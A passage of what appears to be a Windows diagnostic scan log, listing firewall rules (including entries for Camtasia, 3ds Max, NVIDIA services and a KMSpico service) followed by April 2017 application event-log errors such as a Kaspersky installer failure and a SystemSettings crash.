FirewallRules: [{6CE56761-021D-4E5B-B020-3B10B9A7A025}] => (Allow) %ProgramFiles% (x86)\TechSmith\Camtasia Studio 8\CamRecorder.exe
FirewallRules: [{9567E369-C12E-4865-9455-8962BD5E4A0F}] => (Block) %ProgramFiles% (x86)\TechSmith\Camtasia Studio 8\CamRecorder.exe
FirewallRules: [{82B8402B-9465-4937-BA10-2022841CAF72}] => (Block) %ProgramFiles% (x86)\TechSmith\Camtasia Studio 8\CamtasiaStudio.exe
FirewallRules: [{43D53AC7-724A-4F62-AC10-C7A7BE754EFC}] => (Allow) LPort=31637
FirewallRules: [{A62C9220-65EC-492E-90BE-1C5C95A8246C}] => (Allow) LPort=31637
FirewallRules: [{1EA65B24-A526-481A-BE8A-9E2E1ABE1AE1}] => (Allow) LPort=9876
FirewallRules: [{28FC8657-2B90-41F4-84F1-5E7E50B56A42}] => (Allow) LPort=9876
FirewallRules: [{251933E4-DFA7-4A77-A69C-DFA628F0C850}] => (Allow) LPort=67
FirewallRules: [{15D0F4F7-FDA7-4E4A-9DCD-90862B08F75F}] => (Allow) LPort=67
FirewallRules: [{0993C9C8-3B95-40AE-B5D5-88E79935B200}] => (Allow) LPort=68
FirewallRules: [{1E0DA934-2ECC-43FA-954A-D94B2696B102}] => (Allow) LPort=68
FirewallRules: [{6C543498-4DE9-45AD-B6A9-F005D41879B1}] => (Allow) LPort=21346
FirewallRules: [{DF797D0A-24D6-4D06-81AF-8E1ABB2501AE}] => (Allow) LPort=21346
FirewallRules: [{A4FF62FB-D001-4C9C-9870-1980C898449A}] => (Allow) C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe
FirewallRules: [{E1DCFE67-D423-41B6-A5AB-A7069320A483}] => (Allow) C:\Program Files (x86)\CodeMeter\Runtime\bin\CodeMeter.exe
FirewallRules: [{819A4F34-072B-4E8A-9783-7D702C06EA75}] => (Allow) LPort=31637
FirewallRules: [{807739B9-B026-47B7-8311-3FB991865496}] => (Allow) LPort=31637
FirewallRules: [{A70D97C0-B83A-4195-A380-652606D058CF}] => (Allow) LPort=9876
FirewallRules: [{17A94E61-D0B1-40EF-A268-55EAF75429F9}] => (Allow) LPort=9876
FirewallRules: [{20B6E0E0-6A92-4B18-B969-6A48B4EC2CCB}] => (Allow) LPort=67
FirewallRules: [{8CABEB33-5E0C-4596-B32E-4D0BDC594066}] => (Allow) LPort=67
FirewallRules: [{D2CAB406-76C7-4D37-B32B-C1E0BCCD49B9}] => (Allow) LPort=68
FirewallRules: [{56D043B8-F66C-41E6-A0A5-0EDA5A8DAC9E}] => (Allow) LPort=68
FirewallRules: [{5C790FE7-0416-40AF-AFD3-B1C9F9B8F42A}] => (Allow) LPort=21346
FirewallRules: [{5C4EB080-759A-4B9C-AD7D-1331AEFF9F92}] => (Allow) LPort=21346
FirewallRules: [{F536372A-A1F7-4B34-BA1E-E50844682CC6}] => (Allow) LPort=31637
FirewallRules: [{91F6A8E0-D8FE-48C6-BEA0-13F6D5F3216C}] => (Allow) LPort=31637
FirewallRules: [{C93E1FA3-208A-48AC-9937-7686E7739089}] => (Allow) LPort=9876
FirewallRules: [{84763B6C-BED8-4AAF-9EA2-ABBF07BCA9B4}] => (Allow) LPort=9876
FirewallRules: [{3BEA18C1-16C9-4290-8DD6-16FE6F64A902}] => (Allow) LPort=67
FirewallRules: [{90A3129F-C97A-494A-A600-683A9EBEC812}] => (Allow) LPort=67
FirewallRules: [{A7A77E10-3393-4B95-97B5-6BA2D34648CA}] => (Allow) LPort=68
FirewallRules: [{1C771A7F-1733-422B-9AEF-14829FC30741}] => (Allow) LPort=68
FirewallRules: [{C1BC519E-2CA4-46E9-BB5D-77E360482062}] => (Allow) LPort=21346
FirewallRules: [{520C62F2-FEF1-4590-92C5-F2A85B8EA817}] => (Allow) LPort=21346
FirewallRules: [{98DFC864-F5A9-4BEB-ADB9-72991BAB093D}] => (Block) %ProgramFiles% (x86)\TechSmith\Camtasia Studio 8\CamtasiaStudio.exe
FirewallRules: [{7BFD2FB6-159B-49D6-B00E-A56D4E6EDE86}] => (Allow) C:\Program Files (x86)\TechSmith\Camtasia Studio 8\CamtasiaStudio.exe
FirewallRules: [{2B10C6A9-502E-4DF9-A8FF-2DD14BDFAE23}] => (Allow) C:\Program Files (x86)\TechSmith\Camtasia Studio 8\CamtasiaStudio.exe
FirewallRules: [{E32457B4-F09D-4E18-A600-A72F8D755BEA}] => (Allow) C:\Program Files (x86)\TechSmith\Camtasia Studio 8\CamtasiaStudio.exe
FirewallRules: [{17EC8A67-C12D-4220-BBB7-12E02490ADB6}] => (Allow) C:\Program Files (x86)\TechSmith\Camtasia Studio 8\CamtasiaStudio.exe
FirewallRules: [{0D985AC1-7B4B-4A55-9113-9EE69FE85D24}] => (Allow) LPort=31637
FirewallRules: [{ECD916BC-5351-4066-9D78-A900B8E69864}] => (Allow) LPort=31637
FirewallRules: [{B4F1083E-DE03-464F-BC8A-01C146CE72F7}] => (Allow) LPort=9876
FirewallRules: [{992AC2A1-DB14-4EB9-BA5A-96956A17C6FC}] => (Allow) LPort=9876
FirewallRules: [{DAFD1FA3-631A-4C83-B8B3-086BC7792C61}] => (Allow) LPort=67
FirewallRules: [{F2924E70-150F-4AF4-A887-9A061312765B}] => (Allow) LPort=67
FirewallRules: [{0C5231E2-EB17-49A5-A8D1-D3F9E301DBD5}] => (Allow) LPort=68
FirewallRules: [{D27DDF1C-988B-46FD-9FC2-23F697AFE2DD}] => (Allow) LPort=68
FirewallRules: [{93493406-2090-4687-9C30-F2AB7E4FC2E2}] => (Allow) LPort=21346
FirewallRules: [{2E2BA09A-214F-499A-B347-9FCC38C3CE12}] => (Allow) LPort=21346
FirewallRules: [{BFE7F441-BA56-4668-9315-F913206F7832}] => (Allow) LPort=31637
FirewallRules: [{CF57FD68-B600-48F5-8781-BBF0A0654709}] => (Allow) LPort=31637
FirewallRules: [{8DFD2EE3-66E9-4280-8055-39F30391C845}] => (Allow) LPort=9876
FirewallRules: [{1974F0DF-4AAF-4CEC-8CD9-9FC70B0DFC0A}] => (Allow) LPort=9876
FirewallRules: [{09E49959-9EFD-4AC5-B972-211271A43BD6}] => (Allow) LPort=67
FirewallRules: [{F371887C-EB7A-4778-A0AF-650882755E3A}] => (Allow) LPort=67
FirewallRules: [{AD49B176-0F59-4108-8F92-171E4F2C7C25}] => (Allow) LPort=68
FirewallRules: [{3D6208BD-3C71-45CA-99A2-FFB9A4060CDF}] => (Allow) LPort=68
FirewallRules: [{00AFC238-D9D2-4DC6-8BC3-1AE0EEE87225}] => (Allow) LPort=21346
FirewallRules: [{70A805D4-F773-4075-AE65-F65FAAE23E6B}] => (Allow) LPort=21346
FirewallRules: [{3837BCA1-E89E-4576-A2CB-7B0E13A3F535}] => (Allow) LPort=8318
FirewallRules: [{28DEDE99-069D-4802-9A5A-C1270DF2BA62}] => (Block) G:\BNK\3ds max 14\3dsMax_2014_64bit\Setup.exe
FirewallRules: [{7EB9FCB9-29EE-4AEF-9785-7182BDE37D20}] => (Block) G:\BNK\3ds max 14\3dsMax_2014_64bit\Setup.exe
FirewallRules: [{68DBFFB6-775F-4690-A3B7-CAC26272FB28}] => (Allow) D:\Program Files\Autodesk\3ds Max 2014\NVIDIA\Satellite\raysat_3dsmax2014_64server.exe
FirewallRules: [{4F307952-7FFE-4187-966E-D51B65F1CEF5}] => (Allow) D:\Program Files\Autodesk\3ds Max 2014\NVIDIA\Satellite\raysat_3dsmax2014_64server.exe
FirewallRules: [{1EE49CAE-429D-4463-9912-BE58EB8F74F8}] => (Allow) D:\Program Files\Autodesk\3ds Max 2014\NVIDIA\Satellite\raysat_3dsmax2014_64.exe
FirewallRules: [{8ED75AF3-8F73-48EF-9079-41EC63DEDFC9}] => (Allow) D:\Program Files\Autodesk\3ds Max 2014\NVIDIA\Satellite\raysat_3dsmax2014_64.exe
FirewallRules: [{DFC3C62F-4736-4427-A8CB-C02F1E9FAC5A}] => (Allow) C:\Program Files (x86)\Autodesk\Backburner\monitor.exe
FirewallRules: [{700688F5-A00C-43AD-8CF3-9E820BEE1FC8}] => (Allow) C:\Program Files (x86)\Autodesk\Backburner\monitor.exe
FirewallRules: [{EB96DE02-F305-4AE0-A5B2-D47C2C5DD0B5}] => (Allow) C:\Program Files (x86)\Autodesk\Backburner\manager.exe
FirewallRules: [{035D4DD5-47FD-45A9-9568-9AB2B243D77E}] => (Allow) C:\Program Files (x86)\Autodesk\Backburner\manager.exe
FirewallRules: [{93B7035B-7079-44AB-9BFA-3D50D8432842}] => (Allow) C:\Program Files (x86)\Autodesk\Backburner\server.exe
FirewallRules: [{E932F931-7207-4019-B931-9824FB4A15AE}] => (Allow) C:\Program Files (x86)\Autodesk\Backburner\server.exe
FirewallRules: [{FAE4ADB0-C19F-46F4-80DA-7B901F99181C}] => (Allow) E:\SteamLibrary\steamapps\common\Team Fortress 2\hl2.exe
FirewallRules: [{C22F8B99-BC66-4024-AEB7-EA86C6694334}] => (Allow) E:\SteamLibrary\steamapps\common\Team Fortress 2\hl2.exe
FirewallRules: [{302D0C9D-93C2-4BB8-A574-9CD3050FF6FD}] => (Allow) LPort=31637
FirewallRules: [{DD88A6AB-DB9E-4944-A53E-C59306A57396}] => (Allow) LPort=31637
FirewallRules: [{3519478D-7438-4FB6-9033-DB730AFC9065}] => (Allow) LPort=9876
FirewallRules: [{0A0AE499-39B5-4734-B8BF-7EB2D92FA57E}] => (Allow) LPort=9876
FirewallRules: [{0A6BC745-47D5-4B14-9BDA-16E45AC1F547}] => (Allow) LPort=67
FirewallRules: [{2420DE53-4A17-407A-9620-1EAA1A7841C2}] => (Allow) LPort=67
FirewallRules: [{0616F88A-DF3A-4C04-926B-21DA86F15B6B}] => (Allow) LPort=68
FirewallRules: [{C419B882-2261-4223-839C-3FE0CA9B989A}] => (Allow) LPort=68
FirewallRules: [{D7FB831D-9701-4747-BD1C-415E6B202609}] => (Allow) LPort=21346
FirewallRules: [{39F20C25-0C0D-4178-A34C-0B560C739479}] => (Allow) LPort=21346
FirewallRules: [{2ABA814D-7540-40F2-84CE-EFC162E0D026}] => (Allow) LPort=31637
FirewallRules: [{A57E8ABF-ADAB-4A79-885F-69BCE33BBBDE}] => (Allow) LPort=31637
FirewallRules: [{36F4A7D6-1068-498D-BF28-9E301C11CAEE}] => (Allow) LPort=9876
FirewallRules: [{4179002C-D6C0-4DD3-814E-51FEE8096E59}] => (Allow) LPort=9876
FirewallRules: [{0C74C1CA-512F-4785-A3DE-BF3664CE6EE5}] => (Allow) LPort=67
FirewallRules: [{2DC908C2-B265-40E1-9C45-F707C5C812A6}] => (Allow) LPort=67
FirewallRules: [{B6507205-CBD1-409D-995F-80B740477AF2}] => (Allow) LPort=68
FirewallRules: [{1A59E809-5FFF-48F8-B291-83DA34859ECC}] => (Allow) LPort=68
FirewallRules: [{7A47125B-C755-4B10-9A9A-0F9216B67EF8}] => (Allow) LPort=21346
FirewallRules: [{ADCBAF4B-B339-4C31-9980-6CFDBAB6D603}] => (Allow) LPort=21346
FirewallRules: [{13942D50-7E64-4B3C-B693-B027A0CA8413}] => (Allow) LPort=31637
FirewallRules: [{E0FE9812-A176-4941-9911-656450AD13AD}] => (Allow) LPort=31637
FirewallRules: [{876425F1-00C9-431F-8598-0589E8590B4F}] => (Allow) LPort=9876
FirewallRules: [{3F2FFA12-CD03-429C-AFC1-CEB55DB39028}] => (Allow) LPort=9876
FirewallRules: [{B512695A-78EF-44E0-966D-27CDFED566A9}] => (Allow) LPort=67
FirewallRules: [{31F88933-670E-4CD9-A610-486D8D68FC69}] => (Allow) LPort=67
FirewallRules: [{A6DD6991-D8E4-4998-97AA-C6B0975CC216}] => (Allow) LPort=68
FirewallRules: [{08AF42F1-E397-43E4-9EBD-0E7AA3084081}] => (Allow) LPort=68
FirewallRules: [{B24631EA-B99F-463E-AB91-7AEF756AB945}] => (Allow) LPort=21346
FirewallRules: [{58EB4BB6-1818-4BC1-B391-71F569F6E869}] => (Allow) LPort=21346
FirewallRules: [{3E3159D8-3CE0-4C0F-B47D-EC6BE538E7DC}] => (Allow) LPort=31637
FirewallRules: [{B7574949-0379-4C06-BB59-99A4324E41D2}] => (Allow) LPort=31637
FirewallRules: [{AD3A1872-02D2-42C5-9C81-B6F193E6E719}] => (Allow) LPort=9876
FirewallRules: [{49A941F5-798B-4EB3-AC34-844FC8C316B3}] => (Allow) LPort=9876
FirewallRules: [{57C05748-D113-4397-AAD8-0EADE4D93CFB}] => (Allow) LPort=67
FirewallRules: [{62E75911-EEF7-4B88-A001-E90D3A59015E}] => (Allow) LPort=67
FirewallRules: [{9D47D489-E307-4CBD-9F5F-FA56724C3BED}] => (Allow) LPort=68
FirewallRules: [{680D7102-AF09-41AD-A74D-B691FE0A1B58}] => (Allow) LPort=68
FirewallRules: [{750B8910-0322-4DFD-8932-09C31CAEDE10}] => (Allow) LPort=21346
FirewallRules: [{90FD18C8-43F3-4295-AD12-CC1485BE85D7}] => (Allow) LPort=21346
FirewallRules: [{E7C716E9-9904-43E9-929F-C76FD3166EDD}] => (Allow) C:\Program Files (x86)\Sony\Xperia Companion\XperiaCompanion.exe
FirewallRules: [{681AC86A-3AC6-4343-B11F-6705893BCBE2}] => (Allow) LPort=1688
FirewallRules: [{A4532E1B-3442-41AF-BB73-BD366C86B68F}] => (Allow) LPort=31637
FirewallRules: [{324A91C9-1058-4540-8126-B744A08B3689}] => (Allow) LPort=31637
FirewallRules: [{249540F0-535D-43A6-901C-455421E3407C}] => (Allow) LPort=9876
FirewallRules: [{CD2398A5-8134-4F5E-8243-5CA3FE5F6DE9}] => (Allow) LPort=9876
FirewallRules: [{40CCC6E8-A33A-4F2E-BAC5-A7657ED4AC74}] => (Allow) LPort=67
FirewallRules: [{FB6A80AE-47DA-4AB3-BE0B-E896AE38B215}] => (Allow) LPort=67
FirewallRules: [{61C6A88D-83F2-4B6A-9141-AD0E780CCBEE}] => (Allow) LPort=68
FirewallRules: [{EFE99EAC-2CBB-4892-8402-D049608A040C}] => (Allow) LPort=68
FirewallRules: [{8C2B287C-9C42-47E2-A3D4-9C91594D213A}] => (Allow) LPort=21346
FirewallRules: [{319FADFB-A81A-40C8-B9EF-0525CDE965E5}] => (Allow) LPort=21346
FirewallRules: [{1174178A-B3D0-47C7-8A33-081DB00AFA46}] => (Allow) LPort=31637
FirewallRules: [{82918068-61C3-417E-B629-376944F25E6F}] => (Allow) LPort=31637
FirewallRules: [{7C3B737A-4975-4EE0-A903-A8716EE135D2}] => (Allow) LPort=9876
FirewallRules: [{5A040B8F-7E98-4C46-9E7A-670F898AA0FD}] => (Allow) LPort=9876
FirewallRules: [{DDA7685E-CDA6-4655-86DC-01AA45707BF5}] => (Allow) LPort=67
FirewallRules: [{A762500D-0F01-4D6A-BD4F-6CD2449A31D6}] => (Allow) LPort=67
FirewallRules: [{17D68966-5A21-42B2-A410-BE3439CE8A64}] => (Allow) LPort=68
FirewallRules: [{829412C9-F6A7-43D4-90C3-1681CF26D6BB}] => (Allow) LPort=68
FirewallRules: [{5E8F7E43-CF22-4F4C-B86B-ABC0C1257C42}] => (Allow) LPort=21346
FirewallRules: [{64144484-F6AB-45D2-AC2A-52FB9F83483E}] => (Allow) LPort=21346
FirewallRules: [{8D85FEE2-5DA1-4A50-87EE-A399069369A8}] => (Allow) LPort=31637
FirewallRules: [{B65C2486-B8FB-473C-B8EE-3F749701B078}] => (Allow) LPort=31637
FirewallRules: [{77199693-D28C-4CB3-81F9-D3B6214A72E0}] => (Allow) LPort=9876
FirewallRules: [{DB2E7C4F-C6C2-480B-A297-8188EF8517D9}] => (Allow) LPort=9876
FirewallRules: [{F40186B6-9493-472F-ADC7-AA95A37FF17C}] => (Allow) LPort=67
FirewallRules: [{DA804123-3A5C-4DCC-9C95-0F99EB9B28A9}] => (Allow) LPort=67
FirewallRules: [{C080433E-E261-4762-B1F3-65CE48EBD967}] => (Allow) LPort=68
FirewallRules: [{64919839-25E5-41E0-A2B8-E7DE11906D24}] => (Allow) LPort=68
FirewallRules: [{BD24D235-ED4C-432C-85A0-ACEFF42659C2}] => (Allow) LPort=21346
FirewallRules: [{59C8435D-A092-441E-9263-8A5100BA5952}] => (Allow) LPort=21346
FirewallRules: [{BE211BEE-EC7B-48C7-B504-4CC2ABCBF014}] => (Allow) LPort=31637
FirewallRules: [{42FF7A2A-D163-4157-BE7E-8070E0848CF9}] => (Allow) LPort=31637
FirewallRules: [{CACE1359-DB9D-4CE3-99BB-927BCC0CFE58}] => (Allow) LPort=9876
FirewallRules: [{33BA1CDC-1135-46EC-8529-81DDE32E050A}] => (Allow) LPort=9876
FirewallRules: [{00D5CD70-9792-4F57-89DF-E8423F2168DC}] => (Allow) LPort=67
FirewallRules: [{90594BBB-821E-4FCA-AE7E-5C8427495734}] => (Allow) LPort=67
FirewallRules: [{FFAF6A30-3F7D-43CB-A5A8-F1AE636BBBA6}] => (Allow) LPort=68
FirewallRules: [{E8FB892D-DD4D-4794-BE46-8742ED13EC03}] => (Allow) LPort=68
FirewallRules: [{7AA12FFB-F68C-47ED-8B1C-AEF40695E449}] => (Allow) LPort=21346
FirewallRules: [{B29CC351-A3F2-44DB-8019-87230B1FF4E0}] => (Allow) LPort=21346
FirewallRules: [{2798945B-A5F0-4AA2-9F7B-55B59552E6AD}] => (Allow) LPort=31637
FirewallRules: [{88FB45AA-A9B9-428C-9DA7-7896DDA8C3E9}] => (Allow) LPort=31637
FirewallRules: [{8D7F7EEE-E3F5-423D-A5FB-5012E0DC1FA2}] => (Allow) LPort=9876
FirewallRules: [{06EE364D-4BCB-40C0-AEFD-FECC56F600C1}] => (Allow) LPort=9876
FirewallRules: [{492162B7-4BB9-4F50-A433-C5EFFBE1F7A4}] => (Allow) LPort=67
FirewallRules: [{0A6C0264-AE15-43E3-A8F6-841BFED1A1FF}] => (Allow) LPort=67
FirewallRules: [{5D52AA0B-0637-4F42-B24E-BB663D0B9007}] => (Allow) LPort=68
FirewallRules: [{DE16D7C5-6158-482A-82A1-6ACFE7CE79F7}] => (Allow) LPort=68
FirewallRules: [{51C183DA-7F53-48C5-AE35-50463E73C5A3}] => (Allow) LPort=21346
FirewallRules: [{E021D909-ECBA-4541-85DA-57EE7CB02B4C}] => (Allow) LPort=21346
FirewallRules: [{6C299A7D-DAAE-40E0-8C74-DEF455BA8C91}] => (Allow) LPort=31637
FirewallRules: [{AA914198-1494-4FAB-9A0D-B5590DB37F82}] => (Allow) LPort=31637
FirewallRules: [{1C515DCC-746A-4D7F-8759-FE21105C9984}] => (Allow) LPort=9876
FirewallRules: [{A756DD3C-662F-41E6-93E7-9DF161C2AEA2}] => (Allow) LPort=9876
FirewallRules: [{C5A4C198-7D87-48CA-ACA7-C166180A06B4}] => (Allow) LPort=67
FirewallRules: [{F854A11E-33C1-4A5F-9E83-E945A0AE53AC}] => (Allow) LPort=67
FirewallRules: [{8262A3BB-2832-4EC5-AB1E-238B127B1625}] => (Allow) LPort=68
FirewallRules: [{8C9E512D-B16E-4665-9F14-711D016B3FAA}] => (Allow) LPort=68
FirewallRules: [{F3E47DF8-DF6E-48FA-A11E-F91B140F6F39}] => (Allow) LPort=21346
FirewallRules: [{BD8A1B70-7D9F-4670-B60B-0D42956AA632}] => (Allow) LPort=21346
FirewallRules: [{4F12D995-0E68-49FA-B9F4-5E3A407A1BC7}] => (Allow) LPort=31637
FirewallRules: [{3EF5E326-74A7-41EA-A2F3-961A0874AAE8}] => (Allow) LPort=31637
FirewallRules: [{C0E5EC0E-888D-4934-A795-FFA4BED262C5}] => (Allow) LPort=9876
FirewallRules: [{A5D4FEF9-CDBC-4B44-9A98-FDEFEA4E8D94}] => (Allow) LPort=9876
FirewallRules: [{F4CF943B-D908-44D4-BEB8-569BEF10E4DE}] => (Allow) LPort=67
FirewallRules: [{276BCF3B-C1A5-43C3-BAB7-FB9ACADA8A90}] => (Allow) LPort=67
FirewallRules: [{31E91ABA-3B38-4F89-9A6C-B8353F3AD43B}] => (Allow) LPort=68
FirewallRules: [{0E8C5B80-A0AA-411A-95C7-E7535F1B8B0A}] => (Allow) LPort=68
FirewallRules: [{6436A384-3975-433E-B0CF-A91E33E839B9}] => (Allow) LPort=21346
FirewallRules: [{40DC8CA2-800D-48B1-B1BF-793F46BC320D}] => (Allow) LPort=21346
FirewallRules: [{D5475189-DA7F-4D95-B07F-9B58EBE8B517}] => (Allow) LPort=31637
FirewallRules: [{10DC0B4F-66B2-4203-92BB-A7D523D5FE9C}] => (Allow) LPort=31637
FirewallRules: [{DED65972-31BE-44A7-BAEC-0493B3FAAB5E}] => (Allow) LPort=9876
FirewallRules: [{7A58E74C-C7CF-452D-8A3C-4EC1BBF95309}] => (Allow) LPort=9876
FirewallRules: [{33D1898D-F5B2-4946-9BE5-A81C9EF36985}] => (Allow) LPort=67
FirewallRules: [{CB3929AE-2D05-462C-8A3B-C15C4C41537D}] => (Allow) LPort=67
FirewallRules: [{2879E547-71F7-407E-883D-A2FBAF19138C}] => (Allow) LPort=68
FirewallRules: [{EE5BFF5B-841A-47CD-8F7A-67D5F3007192}] => (Allow) LPort=68
FirewallRules: [{DE0CDF76-1090-449D-93F6-996BD5B25C86}] => (Allow) LPort=21346
FirewallRules: [{72609A10-FE84-465D-AE1B-657EB77CF33F}] => (Allow) LPort=21346
FirewallRules: [{1D138373-05DF-4899-9E67-E3C0710C2846}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{760F6275-028B-409C-8EA3-629D22F64DAB}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{95FD6D2D-5FD9-4584-A2E9-E71BF3A05F32}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
FirewallRules: [{719A2634-EF59-4367-9618-680AE924CF77}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
FirewallRules: [{E3D299C4-4A90-4A3A-AAEB-4CCE3E5539F6}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{C1E1ABC6-3330-4A6D-B4EF-36AEDE8C68E7}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{D7662968-C04F-412F-B81C-464FD147A5A9}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe
FirewallRules: [{40531E29-5B79-41B4-A6C0-166BDBEBF7FC}] => (Allow) LPort=31637
FirewallRules: [{C9DA8603-6823-4179-8312-6AEFDFCEFC1B}] => (Allow) LPort=31637
FirewallRules: [{54EE8AAB-B844-4722-9C5E-38632C26DC8F}] => (Allow) LPort=9876
FirewallRules: [{604E44BC-1CAF-4236-9932-3533B1E6E5C9}] => (Allow) LPort=9876
FirewallRules: [{1277F1D3-88E7-4C7F-A0C8-9A37CE556CE8}] => (Allow) LPort=67
FirewallRules: [{A6284BC4-94F5-4C6F-8E7B-A1A2F13C04B4}] => (Allow) LPort=67
FirewallRules: [{47991260-F8AC-4A82-8545-AA680624579E}] => (Allow) LPort=68
FirewallRules: [{9DBC3C13-3662-41D4-9B0B-8A879454BAAC}] => (Allow) LPort=68
FirewallRules: [{7B821043-66FB-4A9F-8FE3-F8DAF18E936C}] => (Allow) LPort=21346
FirewallRules: [{578CE8E8-E7EB-441B-8C81-57653FCDF63C}] => (Allow) LPort=21346
FirewallRules: [{9FFCFE62-B31C-4A8D-AD87-3BA52A9BD94A}] => (Allow) LPort=31637
FirewallRules: [{F14F281C-46BE-40B4-8384-4668F3260E8D}] => (Allow) LPort=31637
FirewallRules: [{1932344D-6389-48AE-A7F9-873AD1CE46F8}] => (Allow) LPort=9876
FirewallRules: [{3838A6D3-7DC3-4F0F-9A9C-5C9B9F1B419E}] => (Allow) LPort=9876
FirewallRules: [{CA3E55F1-B6B1-4106-8CDA-FD4606A1BB61}] => (Allow) LPort=67
FirewallRules: [{1E476403-0BC9-4FB2-9A49-940EA3B3B05A}] => (Allow) LPort=67
FirewallRules: [{B8744FDC-3D91-40CA-8F68-0D69B416C2BD}] => (Allow) LPort=68
FirewallRules: [{2C7FE1DF-4670-4DE9-8038-79206D817E63}] => (Allow) LPort=68
FirewallRules: [{4B16C3F1-D0C5-4DA9-BAA9-31EE66FF4F03}] => (Allow) LPort=21346
FirewallRules: [{F6C35BDE-EC3C-401B-BD37-B79FD261CA72}] => (Allow) LPort=21346
FirewallRules: [{92DC7F5B-7F75-404B-BE7E-3E62C1F9F1A3}] => (Allow) LPort=31637
FirewallRules: [{4E6C016B-E834-4590-82D3-234CE706D385}] => (Allow) LPort=31637
FirewallRules: [{56B13870-C2D7-43FB-A64B-CA6503B4C544}] => (Allow) LPort=9876
FirewallRules: [{87717052-9CDD-465E-9EEC-0097898E48AD}] => (Allow) LPort=9876
FirewallRules: [{DB2832D0-CA26-4D9B-92B4-EDAEBEF86F21}] => (Allow) LPort=67
FirewallRules: [{C37DE2C7-E2B0-4451-B03F-533955CF0C78}] => (Allow) LPort=67
FirewallRules: [{47559961-1580-4B9D-B293-0BD66AFE7377}] => (Allow) LPort=68
FirewallRules: [{C8605B32-DA69-4E7D-A1D4-D5B3B4E10601}] => (Allow) LPort=68
FirewallRules: [{979817F5-A3C4-4A63-92E5-C1BF3761A967}] => (Allow) LPort=21346
FirewallRules: [{945232E8-B63D-4DCF-BB38-4916402BD156}] => (Allow) LPort=21346
FirewallRules: [{1E6A050D-B814-4152-AC75-E54C2F204CA7}] => (Allow) LPort=31637
FirewallRules: [{07EDC188-DAA2-498F-B7C6-14DEC7BCE159}] => (Allow) LPort=31637
FirewallRules: [{2DB15223-7721-4558-BE9A-CFD9D36A9509}] => (Allow) LPort=9876
FirewallRules: [{1A822FA0-C0A1-4F57-80C0-BA2AC6048654}] => (Allow) LPort=9876
FirewallRules: [{8E9AFEE2-FCB3-4FD0-BDC3-1D80C194BA5E}] => (Allow) LPort=67
FirewallRules: [{D762E399-FCC2-45D0-82B5-DE25551EA7BE}] => (Allow) LPort=67
FirewallRules: [{92E0FFA4-224E-432D-962F-F869AC719E16}] => (Allow) LPort=68
FirewallRules: [{2AFD5780-98D1-4521-A776-0DC9CC225062}] => (Allow) LPort=68
FirewallRules: [{74B46C67-9714-4428-ADFE-1D585A3DE5F4}] => (Allow) LPort=21346
FirewallRules: [{3FCA0531-54CC-4E9B-ADDC-CA0F12B4E533}] => (Allow) LPort=21346
FirewallRules: [{4F98FEAC-3C32-4B7F-993A-AE4AC67A407B}] => (Allow) C:\Program Files\KMSpico\Service_KMS.exe
FirewallRules: [{BC44AF55-B66F-4CD3-AC20-E569C58C970E}] => (Allow) C:\Program Files\KMSpico\Service_KMS.exe
FirewallRules: [{F9D4C7B9-9C5F-44D8-BEEE-8DF85BC9ADFA}] => (Allow) LPort=31637
FirewallRules: [{C89D02DE-710C-4BA1-AD9B-8CA2FDD47A36}] => (Allow) LPort=31637
FirewallRules: [{050023B4-5E6C-490A-979E-396D433084AD}] => (Allow) LPort=9876
FirewallRules: [{DCAE7286-6BA4-4752-A939-599D5FD90EAE}] => (Allow) LPort=9876
FirewallRules: [{BEDA28C8-EF99-41D4-90AF-51C2E0A5AE3D}] => (Allow) LPort=67
FirewallRules: [{F4CEBA44-23E1-493F-AF90-C372DE403799}] => (Allow) LPort=67
FirewallRules: [{AE65A470-B0ED-4544-BA4F-DBD1DA5E7B95}] => (Allow) LPort=68
FirewallRules: [{5553360D-5B63-4900-8034-E971171B629C}] => (Allow) LPort=68
FirewallRules: [{D018E372-5249-41BF-8E95-8CCCDFD94F3C}] => (Allow) LPort=21346
FirewallRules: [{1F2C2459-8999-42EF-8CA1-C9D43FD7A41A}] => (Allow) LPort=21346
==================== Restore Points =========================
==================== Faulty Device Manager Devices =============
==================== Event log errors: =========================
Application errors:
==================
Error: (04/24/2017 06:46:17 PM) (Source: MsiInstaller) (EventID: 11719) (User: Yukiha)
Description: Application: Kaspersky Internet Security -- Error 1719.Windows Installer service could not be accessed. Contact Technical Support to verify that it is properly registered and enabled.
Error: (04/24/2017 06:10:22 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Yukiha)
Description: Activation of app microsoft.windowscommunicationsapps_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1 failed with error: -2144927141 See the Microsoft-Windows-TWinUI/Operational log for additional information.
Error: (04/24/2017 05:58:32 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: SystemSettings.exe, version: 6.3.9600.17489, time stamp: 0x5465bbd5
Faulting module name: fhcfg.dll, version: 6.3.9600.17415, time stamp: 0x545045f0
Exception code: 0xc0000005
Fault offset: 0x0000000000062c18
Faulting process id: 0x17a0
Faulting application start time: 0x01d2bcfea1693e3a
Faulting application path: C:\Windows\ImmersiveControlPanel\SystemSettings.exe
Faulting module path: C:\Windows\System32\fhcfg.dll
Report Id: e8f60188-28f1-11e7-828c-7429af927dee
Faulting package full name: windows.immersivecontrolpanel_6.2.0.0_neutral_neutral_cw5n1h2txyewy
Faulting package-relative application ID: microsoft.windows.immersivecontrolpanel
Error: (04/24/2017 05:58:14 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2486) (User: Yukiha)
Description: App windows.immersivecontrolpanel_6.2.0.0_neutral_neutral_cw5n1h2txyewy+microsoft.windows.immersivecontrolpanel did not launch within its allotted time.
Error: (04/24/2017 05:58:03 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Yukiha)
